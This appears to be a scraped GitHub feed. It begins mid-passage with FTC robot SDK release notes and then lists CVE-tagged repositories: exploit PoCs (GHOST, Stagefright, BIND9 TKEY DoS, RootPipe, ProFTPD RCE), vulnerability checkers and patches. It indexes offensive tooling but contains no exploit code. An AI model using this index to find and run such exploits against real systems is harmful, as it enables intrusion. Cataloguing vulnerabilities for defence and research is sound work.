improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled "Version 3.00 (built on 17.04.013)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color/range/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for ultrasonic sensor. support for IrSeeker. support for LED. support for color sensor. support for CRServo prompt user to configure robot before using programming mode. Provides ability to disable audio cues. various bug fixes and improvements. Version 2.00 (released on 16.08.19) This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important - we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. ContinuousRotationServo class has been added to the FTC SDK. Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map. Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. Prototype Blockly Programming Mode has been added to FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a Javascript enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). Vuforia Computer Vision SDK integrated into FTC SDK. Users can use sample vision targets to get localization information on a standard FTC field. Project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into this package. Inspection function has been integrated into the FTC Robot Controller and Driver Station Apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into FTC SDK. Swap mechanism added to FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter in the configuration info for the two devices). Fix mechanism added to all user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must for a telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (both in the LinearOpMode and OpMode types) and to abort the run, then auto recover has been improved/implemented. Fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users. Release 16.07.08 For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x. Release 16.03.30 For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated. Release 16.03.09 Changes made to make the FTC SDK synchronous (significant change!) waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous. For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For legacy module (NXT compatible), user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD event. Changes made to make code thread safe. Debug keystore added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops for example). Firmware version information for Modern Robotics modules are now logged. Changes made to improve USB comm reliability and robustness. Added support for voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto stop capabilities for op modes. A LinearOpMode class will stop when the statements in runOpMode() are complete. User does not have to push the stop button on the driver station. If an op mode is stopped by the driver station, but there is a run away/uninterruptible thread persisting, the app will log an error message then force itself to crash to stop the runaway thread. Driver Station UI modified to display lowest measured voltage below current voltage (12V battery). Driver Station UI modified to have color background for current voltage (green=good, yellow=caution, red=danger, extremely low voltage). javadoc improved (edits and additional classes). Added app build time to About activity for driver station and robot controller apps. Display local IP addresses on Driver Station About activity. Added I2cDeviceSynchImpl. Added I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate i2c address in software for the Modern Robotics gyro. Release 16.02.09 Improved battery checker feature so that voltage values get refreshed regularly (every 250 msec) on Driver Station (DS) user interface. Improved software so that Robot Controller (RC) is much more resilient and “self-healing” to USB disconnects: If user attempts to start/restart RC with one or more module missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC & DS will display warnings,and robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected the RC will auto detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (identifies the type of module that’s missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled. Note that teams might have to readjust their light threshold values in their op modes. On DS user interface, gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in About screen on RC and DS apps. Incorporated a display filter on pairing screen to filter out devices that don’t use the “-“ format. This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue on with a blank (“”) device name that would disrupt WiFi Direct Pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps Prevent Wifi from entering power saving mode removed unused import from driver station Corrrected "Dead zone" joystick code. LED.getDeviceName and .getConnectionInfo() return null apps check for ROBOCOL_VERSION mismatch Fix for Telemetry also has off-by-one errors in its data string sizing / short size limitations error User telemetry output is sorted. added formatting variants to DbgLog and RobotLog APIs code modified to allow for a long list of op mode names. changes to improve thread safety of RobocolDatagramSocket Fix for "missing hardware leaves robot controller disconnected from driver station" error fix for "fast tapping of Init/Start causes problems" (toast is now only instantiated on UI thread). added some log statements for thread life cycle. moved gamepad reset logic inside of initActiveOpMode() for robustness changes made to mitigate risk of race conditions on public methods. changes to try and flag when WiFi Direct name contains non-printable characters. fix to correct race condition between .run() and .close() in ReadWriteRunnableStandard. updated FTDI driver made ReadWriteRunnableStanard interface public. fixed off-by-one errors in Command constructor moved specific hardware implmentations into their own package. moved specific gamepad implemnatations to the hardware library. changed LICENSE file to new BSD version. fixed race condition when shutting down Modern Robotics USB devices. methods in the ColorSensor classes have been synchronized. corrected isBusy() status to reflect end of motion. corrected "back" button keycode. the notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added Support for Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about Z axis) Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages More descriptive error messages for exceptions in user code. Updated DcMotor API Enable read mode on new address in setI2cAddress Fix so that driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix USB initializtion race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed bug so that USB device is closed if event loop teardown method was not called. Fixed timer UI issue Fixed duplicate name UI bug (Legacy Module configuration). Fixed race condition in EventLoopManager. Fix to keep references stable when updating gamepad. For legacy Matrix motor/servo controllers removed necessity of appending "Motor" and "Servo" to controller names. Updated HT color sensor driver to use constants from ModernRoboticsUsbLegacyModule class. Updated MR color sensor driver to use constants from ModernRoboticsUsbDeviceInterfaceModule class. Correctly handle I2C Address change in all color sensors Updated/cleaned up op modes. Updated comments in LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new of the DcMotor method). Removed K9AutoTime.java op mode. Added MRGyroTest.java op mode (demonstrates how to use MR Gyro Sensor). Added MRRGBExample.java op mode (demonstrates how to use MR Color Sensor). Added HTRGBExample.java op mode (demonstrates how to use HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for Legacy Matrix 9.6V motor/servo controller. Cleaned up build.gradle file. Minor UI and bug fixes for driver station and robot controller apps. Throws error if Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on driver station. The init() and loop() methods are now required (i.e., need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use the LinearOpMode mode to create a linear (not event driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The API for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.** : [chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020](https://api.github.com/repos/chrisneagu/FTC-SKYSTONE-TEAM-DARK-ANGELS-ROMANIA-2020) create time: 2021-03-08T11:34:11Z

**Apache ActiveMQ Remote Code Execution Exploit** : [cyberaguiar/CVE-2016-3088](https://api.github.com/repos/cyberaguiar/CVE-2016-3088) create time: 2021-03-11T05:54:34Z

**None** : [vonderchild/CVE-2016-3088](https://api.github.com/repos/vonderchild/CVE-2016-3088) create time: 2021-03-12T17:12:09Z

**Exploiting CVE-2016-2555 enumerating and dumping the underlying Database.** : [maximilianmarx/atutor-blind-sqli](https://api.github.com/repos/maximilianmarx/atutor-blind-sqli) create time: 2021-03-20T11:42:32Z

**Proof of concept for CVE-2015-0006. Fixed in MS15-005 https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2015/ms15-005 .** : [bugch3ck/imposter](https://api.github.com/repos/bugch3ck/imposter) create time: 2014-04-29T01:05:57Z

**Test wether you're exposed to ghost (CVE-2015-0235). All kudos go to Qualys Security** : [fser/ghost-checker](https://api.github.com/repos/fser/ghost-checker) create time: 2015-01-27T17:31:33Z

**A chef cookbook to test the GHOST vulnerability** : [mikesplain/CVE-2015-0235-cookbook](https://api.github.com/repos/mikesplain/CVE-2015-0235-cookbook) create time: 2015-01-27T20:34:42Z

**None** : [mholzinger/CVE-2015-0235_GHOST](https://api.github.com/repos/mholzinger/CVE-2015-0235_GHOST) create time: 2015-01-28T04:22:05Z

**glibc vulnerability GHOST(CVE-2015-0235) Affected software list** : [piyokango/ghost](https://api.github.com/repos/piyokango/ghost) create time: 2015-01-28T00:14:35Z

**None** : [limkokhole/GHOSTCHECK-cve-2015-0235](https://api.github.com/repos/limkokhole/GHOSTCHECK-cve-2015-0235) create time: 2020-04-23T22:26:31Z

**Ansible playbook, to check for CVE-2015-0235 (GHOST) vulnerability** : [adherzog/ansible-CVE-2015-0235-GHOST](https://api.github.com/repos/adherzog/ansible-CVE-2015-0235-GHOST) create time: 2015-01-28T21:22:33Z

**CVE-2015-0235 patches lenny libc6 packages for amd64** : [favoretti/lenny-libc6](https://api.github.com/repos/favoretti/lenny-libc6) create time: 2015-01-28T23:09:13Z

**Ansible playbook to check vulnerability for CVE-2015-0235** : [aaronfay/CVE-2015-0235-test](https://api.github.com/repos/aaronfay/CVE-2015-0235-test) create time: 2015-01-27T23:45:22Z

**cookbook for update glibc. CVE-2015-0235(GHOST)** : [koudaiii-archives/cookbook-update-glibc](https://api.github.com/repos/koudaiii-archives/cookbook-update-glibc) create time: 2015-01-29T07:14:17Z

**gethostbyname*() buffer overflow exploit in glibc - CVE-2015-0235 https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability** : [nickanderson/cfengine-CVE_2015_0235](https://api.github.com/repos/nickanderson/cfengine-CVE_2015_0235) create time: 2015-01-29T04:58:54Z

**glibc gethostbyname bug** : [tobyzxj/CVE-2015-0235](https://api.github.com/repos/tobyzxj/CVE-2015-0235) create time: 2015-01-30T09:58:09Z

**Script to test vulnarability for CVE-2015-0235** : [JustDenisYT/ghosttester](https://api.github.com/repos/JustDenisYT/ghosttester) create time: 2015-01-30T06:37:06Z

**A shared library wrapper with additional checks for vulnerable functions gethostbyname2_r gethostbyname_r (GHOST vulnerability)** : [makelinux/CVE-2015-0235-workaround](https://api.github.com/repos/makelinux/CVE-2015-0235-workaround) create time: 2015-02-02T11:16:42Z

**Universal xss PoC with multiple target sites (CVE-2015-0072)** : [dbellavista/uxss-poc](https://api.github.com/repos/dbellavista/uxss-poc) create time: 2015-02-21T23:03:48Z

**This script check if your list of server is accepting Export cipher suites and could be vulnerable to CVE-2015-0204** : [felmoltor/FreakVulnChecker](https://api.github.com/repos/felmoltor/FreakVulnChecker) create time: 2015-03-04T14:35:54Z

**Multithreaded FREAK scanner, used to detect SSL EXP Ciphers, vulnerable to CVE-2015-0204** : [scottjpack/Freak-Scanner](https://api.github.com/repos/scottjpack/Freak-Scanner) create time: 2015-03-05T19:21:50Z

**Basic BASH Script to Automate OpenSSL based testing for FREAK Attack (CVE-2015-0204) as advised by Akamai.** : [AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script](https://api.github.com/repos/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script) create time: 2015-03-06T09:40:54Z

**None** : [p1gl3t/CVE-2015-1474_poc](https://api.github.com/repos/p1gl3t/CVE-2015-1474_poc) create time: 2015-03-06T17:04:55Z

**CVE-2015-0235 EXIM ESTMP GHOST Glibc Gethostbyname() DoS Exploit/PoC** : [arm13/ghost_exploit](https://api.github.com/repos/arm13/ghost_exploit) create time: 2015-03-28T01:26:05Z

**xnu local privilege escalation via cve-2015-1140 IOHIDSecurePromptClient injectStringGated heap overflow | poc||gtfo** : [kpwn/vpwn](https://api.github.com/repos/kpwn/vpwn) create time: 2015-03-16T03:43:50Z

**None** : [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://api.github.com/repos/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204) create time: 2015-03-23T10:18:08Z

**None** : [SecurityObscurity/cve-2015-0313](https://api.github.com/repos/SecurityObscurity/cve-2015-0313) create time: 2015-03-22T08:37:36Z

**Proof of Concept OS X Application for RootPipe Privilege Escalation Vulnerability (CVE-2015-1130)** : [Shmoopi/RootPipe-Demo](https://api.github.com/repos/Shmoopi/RootPipe-Demo) create time: 2015-04-10T20:43:13Z

**Docker simulating cve-2015-2208 vulnerability** : [ptantiku/cve-2015-2208](https://api.github.com/repos/ptantiku/cve-2015-2208) create time: 2015-04-11T09:02:47Z

**CVE-2015-1635,MS15-034** : [Zx7ffa4512-Python/Project-CVE-2015-1635](https://api.github.com/repos/Zx7ffa4512-Python/Project-CVE-2015-1635) create time: 2015-04-16T07:31:47Z

**Exploit I used to claim 10% final-grade extra credit in Matthew Might's Compilers class.** : [ScottyBauer/CVE-2015-1318](https://api.github.com/repos/ScottyBauer/CVE-2015-1318) create time: 2015-04-17T20:53:29Z

**Metasploit modules and payload generation files from my Houston Perl Mongers talk about this vulnerability.** : [lightsey/cve-2015-1592](https://api.github.com/repos/lightsey/cve-2015-1592) create time: 2015-04-10T16:16:51Z

**cve_2015-1635** : [neu5ron/cve_2015-1635](https://api.github.com/repos/neu5ron/cve_2015-1635) create time: 2015-04-21T17:22:01Z

**Tool for exploit CVE-2015-3306** : [chcx/cpx_proftpd](https://api.github.com/repos/chcx/cpx_proftpd) create time: 2015-04-21T12:51:51Z

**CVE-2015-3152 PoC** : [duo-labs/mysslstrip](https://api.github.com/repos/duo-labs/mysslstrip) create time: 2015-04-05T17:48:12Z

**cve-2015-3043 flash exploit** : [whitehairman/Exploit](https://api.github.com/repos/whitehairman/Exploit) create time: 2015-05-21T01:09:49Z

**CVE 2015-4024 , bug #69364 , multi process php load test** : [typcn/php-load-test](https://api.github.com/repos/typcn/php-load-test) create time: 2015-05-20T11:47:02Z

**Experiments related to CVE-2015-3456** : [vincentbernat/cve-2015-3456](https://api.github.com/repos/vincentbernat/cve-2015-3456) create time: 2015-05-17T20:14:47Z

**🔥 A checker site for MS15-034 / CVE-2015-1635** : [xPaw/HTTPsys](https://api.github.com/repos/xPaw/HTTPsys) create time: 2015-04-15T15:05:01Z

**Exploits the arbitrary file write bug in proftpd (CVE-2015-3306) attempts code execution** : [nootropics/propane](https://api.github.com/repos/nootropics/propane) create time: 2015-04-26T14:14:34Z

**None** : [weidongl74/cve-2015-2315-report](https://api.github.com/repos/weidongl74/cve-2015-2315-report) create time: 2015-06-08T20:48:10Z

**Proof of Concept code for CVE-2015-0345 (APSB15-07)** : [BishopFox/coldfusion-10-11-xss](https://api.github.com/repos/BishopFox/coldfusion-10-11-xss) create time: 2015-06-11T10:27:49Z

**Docker + CVE-2015-2925 = escaping from --volume** : [Kagami/docker_cve-2015-2925](https://api.github.com/repos/Kagami/docker_cve-2015-2925) create time: 2015-06-30T17:32:51Z

**None** : [betalphafai/cve-2015-3636_crash](https://api.github.com/repos/betalphafai/cve-2015-3636_crash) create time: 2015-07-25T09:29:27Z

**RootPipe (CVE-2015-1130) and Phoenix (CVE-2015-3673) vulnerability testing utility for Mac OS X 10.2.8 and later** : [sideeffect42/RootPipeTester](https://api.github.com/repos/sideeffect42/RootPipeTester) create time: 2015-04-15T15:12:07Z

**A little Python tool for exploiting CVE-2015-1560 and CVE-2015-1561. Quick'n'dirty. Real dirty.** : [Iansus/Centreon-CVE-2015-1560_1561](https://api.github.com/repos/Iansus/Centreon-CVE-2015-1560_1561) create time: 2015-07-31T14:37:50Z

**PoC exploit code for CVE-2015-5477 BIND9 TKEY remote DoS vulnerability** : [elceef/tkeypoc](https://api.github.com/repos/elceef/tkeypoc) create time: 2015-08-01T09:27:23Z

**PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure** : [robertdavidgraham/cve-2015-5477](https://api.github.com/repos/robertdavidgraham/cve-2015-5477) create time: 2015-07-31T23:29:43Z

**None** : [jvazquez-r7/CVE-2015-5119](https://api.github.com/repos/jvazquez-r7/CVE-2015-5119) create time: 2015-07-29T20:21:20Z

**Vulnerability as a service: showcasing CVS-2015-5447, a DDoS condition in the bind9 software** : [hmlio/vaas-cve-2015-5477](https://api.github.com/repos/hmlio/vaas-cve-2015-5477) create time: 2015-08-04T21:11:45Z

**Exploit for CVE-2015-4495 / mfsa2015-78** : [vincd/CVE-2015-4495](https://api.github.com/repos/vincd/CVE-2015-4495) create time: 2015-08-10T22:46:46Z

**xnu local privilege escalation via cve-2015-???? & cve-2015-???? for 10.10.5, 0day at the time | poc or gtfo** : [kpwn/tpwn](https://api.github.com/repos/kpwn/tpwn) create time: 2015-08-15T21:21:29Z

**PoC for BIND9 TKEY assert DoS (CVE-2015-5477)** : [knqyf263/cve-2015-5477](https://api.github.com/repos/knqyf263/cve-2015-5477) create time: 2015-08-09T16:09:52Z

**PoC - Binary patches for CVE-2015-3864 (NOT for production, use at your own risk)** : [pwnaccelerator/stagefright-cve-2015-3864](https://api.github.com/repos/pwnaccelerator/stagefright-cve-2015-3864) create time: 2015-08-18T06:24:25Z

**PoC exploit for CVE-2015-5477 in php** : [ilanyu/cve-2015-5477](https://api.github.com/repos/ilanyu/cve-2015-5477) create time: 2015-08-19T02:35:36Z

**CVE-2015-3636 exploit** : [askk/libping_unhash_exploit_POC](https://api.github.com/repos/askk/libping_unhash_exploit_POC) create time: 2015-08-21T06:39:30Z

**An implementation of the CVE-2015-2153 exploit.** : [arntsonl/CVE-2015-2153](https://api.github.com/repos/arntsonl/CVE-2015-2153) create time: 2015-08-27T17:21:36Z

**I'll submit the poc after blackhat** : [secmob/PoCForCVE-2015-1528](https://api.github.com/repos/secmob/PoCForCVE-2015-1528) create time: 2015-07-17T06:09:41Z

**None** : [ludongxu/cve-2015-3636](https://api.github.com/repos/ludongxu/cve-2015-3636) create time: 2015-08-31T03:28:51Z

**An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution** : [oguzhantopgul/cve-2015-1538-1](https://api.github.com/repos/oguzhantopgul/cve-2015-1538-1) create time: 2015-09-09T16:28:30Z

**CVE-2015-2231 POC** : [rednaga/adups-get-super-serial](https://api.github.com/repos/rednaga/adups-get-super-serial) create time: 2015-09-08T18:39:14Z

**CVE fixes 2015-1789/1790/4000** : [neominds/RIC190022](https://api.github.com/repos/neominds/RIC190022) create time: 2015-08-16T02:49:46Z

**Archive from the article CVE-2015-5119 Flash ByteArray UaF: A beginner's walkthrough** : [CiscoCXSecurity/CVE-2015-5119_walkthrough](https://api.github.com/repos/CiscoCXSecurity/CVE-2015-5119_walkthrough) create time: 2015-09-10T10:10:36Z

**An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution** : [renjithsasidharan/cve-2015-1538-1](https://api.github.com/repos/renjithsasidharan/cve-2015-1538-1) create time: 2015-09-10T19:34:11Z

